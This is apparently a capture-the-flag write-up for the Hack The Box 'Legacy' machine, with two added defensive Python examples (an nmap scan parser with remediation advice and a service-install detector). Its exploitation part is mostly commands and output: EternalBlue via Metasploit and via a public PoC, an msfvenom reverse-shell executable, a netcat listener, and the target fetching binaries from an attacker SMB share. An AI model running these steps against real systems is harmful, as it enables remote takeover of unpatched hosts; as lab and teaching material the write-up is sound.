Hack The Box | Legacy


Initial TCP Nmap Scan

nmap -sC -sV -oA nmap/initial-tcp-legacy   

Full TCP Nmap Scan

nmap -p- -oA htb/legacy/nmap/full-tcp-legacy

Output of Initial TCP Nmap Scan

Nmap scan report for
Host is up (0.077s latency).
Not shown: 997 filtered ports
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h30m33s, deviation: 2h07m16s, median: 4d23h00m33s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:08:52 (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2021-05-28T20:36:26+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 23 08:36:43 2021 -- 1 IP address (1 host up) scanned in 64.79 seconds

Initial Thoughts Based On Nmap Scan

What are ports 139 and 445?

Only three ports appear in the scan: 139, 445, and 3389. Port 3389 is closed, so it will not be considered, which leaves me with two ports: 139 and 445. Both carry the Server Message Block (“SMB”) protocol. SMB is essentially a protocol that allows applications and services on networked computers to communicate with each other, and it provides core features such as printing, file sharing, and device sharing. SMB originally ran on top of NetBIOS, using port 139. In simple terms, NetBIOS provides session-layer (OSI model) services that let computers on the same network (a Local Area Network, “LAN”) talk to each other. Later versions of SMB run directly on top of the Transmission Control Protocol (“TCP”), using port 445. TCP is simply a transport protocol that runs on top of the Internet Protocol (“IP”) to transmit packets. IP relays datagrams across network boundaries, and its routing enables internetworking and essentially establishes the internet.

How can these ports be exploited?

Again, SMB provides core features such as printing, file sharing, and device sharing. Knowing this, misconfigurations or poor security may have been overlooked. These can include things such as null authentication (being able to get into SMB file shares with no authentication), the ability to enumerate users through SMB, exposure of personally identifiable information (“PII”), and so on. Another way ports 139 and 445 can be exploited is simply through out-of-date SMB versions. Some out-of-date SMB versions are highly vulnerable and can lead to a full system compromise, so looking into that as well is ideal.

139 - 445 SMB Enumeration

The first tool I will be using is Enum4linux, which is a tool for enumerating information from SMB.

enum4linux -a
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun May 23 09:08:16 2021        
|    Target Information    |                               
Target ...........                              
RID Range ........ 500-550,1000-1050           
Username ......... ''                                      
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none                                                                    

|    Enumerating Workgroup/Domain on    |
[+] Got domain/workgroup name: HTB                         

|    Nbtstat Information for    |               
Looking up status of                            
LEGACY          <00> -         B <ACTIVE>  Workstation Service      
HTB             <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name                                               
LEGACY          <20> -         B <ACTIVE>  File Server Service                                                 
HTB             <1e> - <GROUP> B <ACTIVE>  Browser Service Elections                                           
HTB             <1d> -         B <ACTIVE>  Master Browser                                                                                                                                                                             
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser                                                      

MAC Address = 00-50-56-B9-08-52         

|    Session Check on    |
[+] Server allows sessions using username '', password ''                                                   

|    Getting domain SID for    |                
Could not initialise lsarpc. Error was NT_STATUS_ACCESS_DENIED                                                         
[+] Can't determine if host is part of domain or part of a workgroup                                                   

|    OS information on    |                     
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.                        
[+] Got OS info for from smbclient: 
[+] Got OS info for from srvinfo:               
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED         
|    Users on    |                                                                                          
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED                                                   
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED                                                    
|    Share Enumeration on    |                  
[E] Can't list shares: NT_STATUS_ACCESS_DENIED             

[+] Attempting to map shares on

|    Password Policy Information for    |
[E] Unexpected error from polenum:

[+] Attaching to using a NULL share

[+] Trying protocol 139/SMB...

[!] Protocol failed: Cannot request session (Called Name:

[+] Trying protocol 445/SMB...

[!] Protocol failed: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

[E] Failed to get password policy with rpcclient

|    Groups on    |

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

|    Users on via RID cycling (RIDS: 500-550,1000-1050)    |
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.

|    Getting printer info for    |
No printers returned.

enum4linux complete on Sun May 23 09:08:26 2021

Looking at the output of Enum4linux, it was able to get a null session, meaning we were able to log in as an anonymous user by supplying a username and password of '', essentially an empty string. Looking at the rest of the output, though, we were not able to enumerate much. Sure, we got a null session, but we do not have the privileges to enumerate anything (note all of the NT_STATUS_ACCESS_DENIED messages). I could try other tools and see if they give a different output (which isn’t a bad thing to do), but it is looking like this will not budge in terms of gathering any information this way. So what’s next?


Next, I will look into whether SMB is vulnerable due to being outdated. This is fairly simple, as Nmap has a feature known as the Nmap Scripting Engine (“NSE”). NSE scripts are simple scripts written in the Lua programming language that automate a variety of networking tasks. These tasks can include network discovery, version detection, and, yes, you guessed it, vulnerability detection. Nmap supplies a plethora of scripts to help us further enumerate SMB and scan it for vulnerabilities. A quick Google search for Nmap NSE SMB scripts will provide a lot of information on each specific script and what it is used for. For now, I will essentially be doing a full enumeration and vulnerability scan using a ton of Nmap scripts for SMB and seeing if anything is vulnerable.

nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery --script-args=unsafe=1 -T5
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-23 09:21 PDT           
Nmap scan report for                                                                       
Host is up (0.078s latency).                   
Not shown: 997 filtered ports
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
3389/tcp closed ms-wbt-server

Host script results:
| smb-enum-shares: 
|   note: ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED)
|   account_used: <blank>
|   \\\ADMIN$: 
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: <none>
|   \\\C$: 
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: <none>
|   \\\IPC$: 
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|_    Anonymous access: READ
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2021-05-28T21:22:05+03:00
|_smb-print-text: false
| smb-protocols: 
|   dialects: 
|_    NT LM 0.12 (SMBv1) [dangerous, but default]
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb-vuln-ms10-054: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_smb2-time: Protocol negotiation failed (SMB2)

Nmap done: 1 IP address (1 host up) scanned in 88.81 seconds

Looking at the output from Nmap, we can see that some of the scripts failed (most likely because the host was not vulnerable to those), but we do see that it found one vulnerability, reported by smb-vuln-ms17-010. This vulnerability is also known as EternalBlue, which was developed by the NSA. If you want to read more about EternalBlue, you can check out the Wikipedia page about it here. For now, let’s figure out if we can gain initial access to this machine through this attack vector.
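The same scan output is what a defender would triage. As an added example (not part of the original writeup), here is a small Python script that parses the kind of 'Host script results' block shown above into the facts that matter for remediation: the negotiated dialect, the signing state, the MS17-010 result, and which shares accept anonymous access. The sample text is constructed from the scan output on this page; the regexes, the field names and the remediation wording are my own assumptions, not nmap's.

```python
import re

# Constructed sample: an excerpt of the nmap host-script output shown above.
SAMPLE_SCAN = r"""Host script results:
| smb-enum-shares:
|   \\\IPC$:
|_    Anonymous access: READ
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
| smb-protocols:
|   dialects:
|_    NT LM 0.12 (SMBv1) [dangerous, but default]
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
| smb-vuln-ms17-010:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_smb2-time: Protocol negotiation failed (SMB2)
"""

HEADER = re.compile(r"^\|[_ ]([A-Za-z0-9-]+):\s*(.*)$")   # '| smb-protocols:' or '|_smb2-time: ...'
INNER = re.compile(r"^\|[_ ]\s+(.*)$")                     # indented detail line of the current script

def parse_host_scripts(text):
    """Return {script_name: [detail lines]} from a 'Host script results' block."""
    scripts, current = {}, None
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            current = m.group(1)
            scripts[current] = [m.group(2)] if m.group(2) else []
        elif current and (m := INNER.match(line)):
            scripts[current].append(m.group(1).strip())
    return scripts

def smb_findings(scripts):
    """Reduce the parsed scripts to the facts a defender acts on."""
    vuln = scripts.get("smb-vuln-ms17-010", [])
    anon, share = [], None
    for line in scripts.get("smb-enum-shares", []):
        if line.startswith("\\") and line.endswith(":"):      # '\\\IPC$:' opens a share block
            share = line.strip("\\:")
        elif line.startswith("Anonymous access:") and share:
            level = line.split(":", 1)[1].strip()
            if level != "<none>":
                anon.append((share, level))
    return {
        "os": next((l[4:] for l in scripts.get("smb-os-discovery", []) if l.startswith("OS: ")), None),
        "smbv1_enabled": any("SMBv1" in l for l in scripts.get("smb-protocols", [])),
        "signing_disabled": any(l.startswith("message_signing: disabled")
                                for l in scripts.get("smb-security-mode", [])),
        "ms17_010_vulnerable": "State: VULNERABLE" in vuln,
        "cves": sorted({c for l in vuln for c in re.findall(r"CVE-\d{4}-\d+", l)}),
        "anonymous_shares": anon,
    }

REMEDIATION = {
    "ms17_010_vulnerable": "Apply the MS17-010 update, or retire the host: Windows XP is out of support.",
    "smbv1_enabled": "Disable the SMBv1 dialect (the only dialect this host negotiates).",
    "signing_disabled": "Require SMB message signing so sessions cannot be relayed or tampered with.",
}

def remediation_plan(findings):
    """Ordered list of fixes implied by the findings."""
    steps = [text for key, text in REMEDIATION.items() if findings.get(key)]
    for share, level in findings["anonymous_shares"]:
        steps.append(f"Remove anonymous {level} access to {share}: null sessions are accepted.")
    return steps

if __name__ == "__main__":
    for step in remediation_plan(smb_findings(parse_host_scripts(SAMPLE_SCAN))):
        print("-", step)
```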

Exploiting EternalBlue

When approaching this exploit, there are two ways we can do it: manually, or with the Metasploit Framework. “The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. The Metasploit Framework contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. At its core, the Metasploit Framework is a collection of commonly used tools that provide a complete environment for penetration testing and exploit development” (Rapid7). Seeing what Metasploit is, it definitely sounds like an enticing option, but if you are prepping for the OSCP, you might want to practise both Metasploit and a manual method. The reason is that using the Metasploit Framework is only allowed once on the OSCP exam. Knowing this, it seems practical to figure out how to exploit this manually as well as with the Metasploit Framework, so let’s do both.

Metasploit Framework

└─# msfconsole                          
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt

       =[ metasploit v6.0.41-dev                          ]
+ -- --=[ 2122 exploits - 1138 auxiliary - 360 post       ]
+ -- --=[ 594 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Enable HTTP request and response logging 
with set HttpTrace true

msf6 > search ms17-010

Matching Modules

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   2  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   3  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   4  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 > use exploit/windows/smb/ms17_010_psexec 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > options

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                            Required  Description
   ----                  ---------------                            --------  -----------
   DBGTRACE              false                                      yes       Show extra debug trace info
   LEAKATTEMPTS          99                                         yes       How many times to try to leak transaction
   NAMEDPIPE                                                        no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/word  yes       List of named pipes to check
   RHOSTS                                                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<
   RPORT                 445                                        yes       The Target port (TCP)
   SERVICE_DESCRIPTION                                              no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                             no        The service display name
   SERVICE_NAME                                                     no        The service name
   SHARE                 ADMIN$                                     yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal r
                                                                              ead/write folder share
   SMBDomain             .                                          no        The Windows domain to use for authentication
   SMBPass                                                          no        The password for the specified username
   SMBUser                                                          no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(windows/smb/ms17_010_psexec) > set lhost
lhost =>
msf6 exploit(windows/smb/ms17_010_psexec) > set rhosts
rhosts =>
msf6 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 
[*] - Target OS: Windows 5.1
[*] - Filling barrel with fish... done
[*] - <---------------- | Entering Danger Zone | ---------------->
[*] -    [*] Preparing dynamite...
[*] -            [*] Trying stick 1 (x86)...Boom!
[*] -    [+] Successfully Leaked Transaction!
[*] -    [+] Successfully caught Fish-in-a-barrel
[*] - <---------------- | Leaving Danger Zone | ---------------->
[*] - Reading from CONNECTION struct at: 0x81a8e168
[*] - Built a write-what-where primitive...
[+] - Overwrite complete... SYSTEM session obtained!
[*] - Selecting native target
[*] - Uploading payload... zZKBrhbC.exe
[*] - Created \zZKBrhbC.exe...
[+] - Service started successfully...
[*] Sending stage (175174 bytes) to
[*] - Deleting \zZKBrhbC.exe...
[*] Meterpreter session 1 opened ( -> at 2021-05-23 09:36:32 -0700

meterpreter >

And just like that we have a SYSTEM session. SYSTEM is the highest-privileged account we can have on a Windows workstation. But I’m going to break down exactly what I entered to get this SYSTEM session.

First, you can simply type msfconsole in your terminal to get access to the Metasploit Framework. From there I needed to search for the ms17-010 vulnerability within the Metasploit Framework to see if it has modules I can use to exploit it. To do this, you can type search [exploit_name] to find the exploit you are looking for and see if it is present. For me, this was search ms17-010. The one that worked best for me was entry 2, exploit/windows/smb/ms17_010_psexec (MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution). Now that we know the module exists, you select it with the path it provides: use exploit/windows/smb/ms17_010_psexec.


With that done, the only thing left to do is configure the module. To configure the module and see what values it needs to run, simply execute the options command. For this module, everything was already set for the most part; the only things we needed to change were LHOST and RHOSTS. LHOST stands for local host, aka your IP address, so this is going to be your HTB VPN IP address. Then there is RHOSTS, which stands for remote host(s); this is going to be the IP address of our target. To enter these values into the module, simply type set, the option name, and then the value. For example, set rhosts followed by the target address will set RHOSTS to that address. All you need to do is set LHOST in a similar fashion and everything should be ready. Now you can execute the exploit command and get a shell! Easy as that.

Manual Exploit

When looking into manual exploits, there is a chance that a proof of concept (“PoC”) is already publicly available. Searching Google for “ms17-010”, I found a repo from the user “helviojunior” that is a pretty nice one to clone and will help us exploit ms17-010 without the Metasploit Framework. The link to the GitHub repo is below. The specific file I’ll be working with is send_and_execute.py. To clone the repo you can run the following command:

git clone https://github.com/helviojunior/MS17-010.git

The reason for choosing that file is that, looking through each of the files in the repo, it is the one that has been tested on Windows XP, which is what our box runs. For this exploit we are going to need a payload. For that we can use MSFvenom, which will create our Windows reverse shell payload.

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f exe > eternalblue.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

Breaking down the flags: -p specifies what type of payload we want, and -f specifies what format we want, which here is an executable file (exe). LHOST and LPORT mean the same as in the Metasploit Framework section: your local host and your local port. With this command we create an executable payload called eternalblue.exe. You could name it whatever you want as long as it ends in .exe. After this we should have an executable called eternalblue.exe in our working directory.

ls -la eternalblue.exe
-rw-r--r-- 1 root root 73802 May 23 14:24 eternalblue.exe

Now I’m going to use the send_and_execute.py file to send over our reverse shell payload eternalblue.exe.

Looking at what is needed from this Python script, we see the following:

python send_and_execute.py                                         
send_and_execute.py <ip> <executable_file> [port] [pipe_name]

So we need to run send_and_execute.py and give it an IP address and an executable file. We have both of those! So let’s pwn this machine manually. Make sure you have a Netcat listener running in the background on the same LPORT you assigned when crafting your MSFvenom reverse shell payload.

nc -lvnp 4444

With my Netcat listener listening on port 4444, just as I specified in my MSFvenom reverse shell payload, I am going to go ahead and execute the exploit.

python send_and_execute.py eternalblue.exe

Trying to connect to
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x81b2dda8
SESSION: 0xe17c1190
FLINK: 0x5bd48
InData: 0x5ae28
MID: 0xa
TRANS1: 0x58b50
TRANS2: 0x5ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe1fb0030
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe1fb00d0
overwriting token UserAndGroups
Sending file WIM5S5.exe...
Opening SVCManager on
Creating service HamL.....
Starting service HamL.....
The NETBIOS connection with the remote host timed out.
Removing service HamL.....
ServiceExec Error on:

Looking back at our Netcat listener, we successfully got a shell!

nc -lvnp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 1031
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
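Both runs above install a short-lived service on the target (Metasploit's "Service started successfully", the manual script's "Creating service HamL") whose binary is written into the ADMIN$ share and then removed again ("Deleting \zZKBrhbC.exe", "Removing service HamL"), so on the host side the durable trace is the Service Control Manager's "a service was installed" record, Event ID 7045 in the System log. As an added example, not part of the original writeup, the following Python detection flags that pattern over constructed sample records; the record shape, the service name "zZKBrhbC" for the Metasploit run (the module leaves SERVICE_NAME blank, so it is generated) and the name heuristic are my assumptions.

```python
import re

# Constructed sample records shaped like Event ID 7045 ("A service was installed
# in the system") from the Windows System log. 'zZKBrhbC' as a service name is an
# assumption; 'HamL' and 'WIM5S5.exe' mirror what the manual script printed.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\WINDOWS\system32\spoolsv.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "zZKBrhbC",
     "ImagePath": r"C:\WINDOWS\zZKBrhbC.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "HamL",
     "ImagePath": r"C:\WINDOWS\WIM5S5.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "VMTools",
     "ImagePath": r"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe", "AccountName": "LocalSystem"},
    {"EventID": 7036, "ServiceName": "HamL", "ImagePath": "", "AccountName": ""},
]

# An .exe sitting directly in %SystemRoot% (what the ADMIN$ share maps to) rather than
# in system32 or Program Files: legitimate services are almost never installed that way.
WINDOWS_ROOT_EXE = re.compile(r"^[A-Za-z]:\\Windows\\[^\\]+\.exe$", re.IGNORECASE)

def looks_generated(name):
    """Heuristic for tool-generated names such as 'HamL': a short alphanumeric token
    with mixed case where an upper-case letter appears after the first character."""
    if not re.fullmatch(r"[A-Za-z0-9]{4,10}", name):
        return False
    return any(c.isupper() for c in name[1:]) and any(c.islower() for c in name)

def suspicious_service_installs(events):
    """Return (service_name, image_path, reasons) for 7045 events whose binary was
    dropped into the Windows root; the other reasons add confidence but are not required."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 7045 or not WINDOWS_ROOT_EXE.match(ev.get("ImagePath", "")):
            continue
        reasons = ["binary installed directly in the Windows root (ADMIN$)"]
        if looks_generated(ev["ServiceName"]):
            reasons.append("service name looks tool-generated")
        binary = ev["ImagePath"].rsplit("\\", 1)[-1].rsplit(".", 1)[0]
        if looks_generated(binary):
            reasons.append("binary name looks tool-generated")
        if ev.get("AccountName") == "LocalSystem":
            reasons.append("runs as LocalSystem")
        hits.append((ev["ServiceName"], ev["ImagePath"], reasons))
    return hits

if __name__ == "__main__":
    for name, image, reasons in suspicious_service_installs(SAMPLE_EVENTS):
        print(f"{name:10} {image}\n    " + "\n    ".join(reasons))
```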


The whoami command is not available on the box, but we can get it to work another way.

'whoami' is not recognized as an internal or external command,
operable program or batch file.

Kali Linux comes with Windows binaries that allow us to run the whoami command. To do this, we can simply host our own SMB server and have the compromised Windows box call out to our SMB server to execute the binary. First, let’s get the SMB server set up. To do that you can run the following command:

smbserver.py share /usr/share/windows-binaries/

Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

With that running, we are hosting an SMB share named share backed by the directory /usr/share/windows-binaries/, which is where the whoami binary resides. Now we can head back to our compromised Windows box and run \\$IP\share\whoami.exe to connect to the SMB server and execute the whoami binary.


And we can see we are SYSTEM!